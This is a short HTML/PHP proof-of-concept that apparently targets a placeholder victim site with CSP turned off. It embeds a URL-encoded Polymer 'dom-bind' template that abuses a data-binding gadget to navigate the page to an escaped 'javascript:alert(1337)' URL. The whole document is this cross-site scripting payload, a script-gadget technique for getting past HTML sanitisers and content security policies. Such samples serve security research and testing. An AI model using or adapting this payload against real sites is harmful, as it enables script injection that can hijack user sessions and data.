<iframe src="https://victim.example.com/repo/filters/noscript/polymer.php?csp=none&inj=<?php 
$payload = <<<'PAYLOAD'
<template is=dom-bind><div
a={{set('root.ownerDocument.location.href','\j\av\a\s\c\r\i\p\t\:\a\l\e\r\t\(1337\)')}}
>
PAYLOAD;
echo urlencode($payload);
?>"></iframe>
